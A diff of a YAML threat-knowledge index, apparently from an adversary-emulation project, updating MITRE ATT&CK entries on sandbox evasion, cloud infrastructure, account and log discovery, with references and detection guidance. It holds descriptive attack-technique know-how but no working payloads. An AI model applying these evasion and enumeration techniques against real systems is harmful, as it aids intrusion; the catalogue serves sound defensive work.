-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -49395,6 +50043,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -49404,9 +50058,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -49416,102 +50075,137 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests: []
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -49565,7 +50259,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests: []
   T1016:
@@ -49595,7 +50288,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -49633,12 +50326,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests: []
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -49665,14 +50357,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -49701,7 +50392,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -49761,7 +50451,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -49780,7 +50470,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests: []
   T1083:
@@ -49849,12 +50538,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests: []
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -49931,40 +50619,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -49976,6 +50635,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -49986,8 +50649,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -49997,9 +50666,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -50032,7 +50720,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50050,12 +50738,11 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests: []
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50063,11 +50750,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -50078,7 +50768,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -50092,6 +50782,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50111,56 +50805,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests: []
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
